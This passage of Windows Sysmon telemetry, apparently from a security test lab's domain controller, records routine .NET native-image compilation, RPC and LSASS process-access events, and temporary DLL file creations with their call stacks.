KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005357Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:31.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90BF-6005-3901-00000000A301}728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005356Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:31.361{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90BF-6005-3901-00000000A301}728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005355Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:31.361{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90BF-6005-3901-00000000A301}728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005354Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:44:31.283{59A5CD1D-90BE-6005-3801-00000000A301}3376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\d30-0\System.Configuration.dll2021-01-18 13:44:31.283 10341000x80000000000000005364Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:32.721{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90C0-6005-3B01-00000000A301}804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005363Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:32.705{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90C0-6005-3B01-00000000A301}804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005362Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:32.705{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90C0-6005-3B01-00000000A301}804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005361Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:44:32.611{59A5CD1D-90BF-6005-3A01-00000000A301}920C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\398-0\System.Drawing.dll2021-01-18 13:44:32.611 10341000x80000000000000005367Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:33.033{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90C1-6005-3C01-00000000A301}4344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005366Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:33.033{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90C1-6005-3C01-00000000A301}4344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005365Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:33.033{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90C1-6005-3C01-00000000A301}4344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005368Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:44:38.752{59A5CD1D-90C1-6005-3C01-00000000A301}4344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\10f8-0\System.Data.dll2021-01-18 13:44:38.752 10341000x80000000000000005393Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:39.689{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90C7-6005-3E01-00000000A301}4688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005392Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:39.674{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90C7-6005-3E01-00000000A301}4688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005391Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:39.674{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90C7-6005-3E01-00000000A301}4688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005390Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:39.627{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005389Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:39.627{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005388Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:39.627{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005387Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:39.627{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000005386Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:39.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005385Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:39.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005384Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:39.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005383Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:39.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005382Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:39.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005381Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:39.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005380Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:39.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005379Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:39.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SY